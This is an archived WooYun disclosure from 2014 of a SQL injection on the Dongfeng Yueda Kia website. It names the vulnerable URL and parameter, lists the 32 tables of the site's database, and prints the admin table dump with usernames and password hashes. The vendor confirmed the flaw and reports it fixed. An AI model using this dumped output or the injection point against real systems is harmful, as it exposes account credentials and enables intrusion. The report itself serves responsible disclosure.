乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-03: 细节已通知厂商并且等待厂商处理中 2014-11-07: 厂商已经确认,细节仅向厂商公开 2014-11-17: 细节向核心白帽子及相关领域专家公开 2014-11-27: 细节向普通白帽子公开 2014-12-07: 细节向实习白帽子公开 2014-12-18: 细节向公众公开
东风悦达起亚主站SQL注入,多库,可脱
主站:http://www.dyk.com.cn/promotion/index?type=89
当前数据库dyk_dyk:
Database: dyk_dyk[32 tables]+---------------------+| ci_addonarticle || ci_admin || ci_admin_node || ci_admin_role || ci_arcatt || ci_archives || ci_arctiny || ci_arctype || ci_attachment || ci_captcha || ci_cartype || ci_channeltype || ci_citys || ci_common_cache || ci_log || ci_login_log || ci_member || ci_member_car || ci_member_msg || ci_member_qq || ci_member_sinaweibo || ci_menu || ci_provinces || ci_search || ci_search_keyword || ci_sendmsg_log || ci_serviceplan || ci_sessions || ci_stepselect || ci_sys_enum || ci_sysconfig || ci_table |+---------------------+
admin账户:
Database: dyk_dykTable: ci_admin[2 entries]+----+---------+----------+---------+---------+----------------------------------+-----------+-------+---------+---------+---------+---------+---------+----------+----------+----------+------------+------------+------------+-------------+---------------+| id | cardid | group_id | qq | msn | pass | name | state | email | phone | posts | answer | mobile | question | realname | birthday | loginCount | modifyTime | createTime | lastLoginIp | lastLoginTime |+----+---------+----------+---------+---------+----------------------------------+-----------+-------+---------+---------+---------+---------+---------+----------+----------+----------+------------+------------+------------+-------------+---------------+| 2 | <blank> | 1 | <blank> | <blank> | fd6ae85c115d21c784ac7f3a3d9606a9 | admin | 1 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | ????? | <blank> | 204 | 0 | 0 | 1875827014 | 1414466431 || 5 | <blank> | 17 | <blank> | <blank> | 9c3782798090e60c81e5c5cc25c7225c | dyk_admin | 0 | <blank> | <blank> | <blank> | <blank> | <blank> | <blank> | ?? | <blank> | 256 | 0 | 0 | 1018097944 | 1414765908 |+----+---------+----------+---------+---------+----------------------------------+-----------+-------+---------+---------+---------+---------+---------+----------+----------+----------+------------+------------+------------+-------------+---------------+
过滤加防护
危害等级:中
漏洞Rank:10
确认时间:2014-11-07 17:58
多谢,已修复。
暂无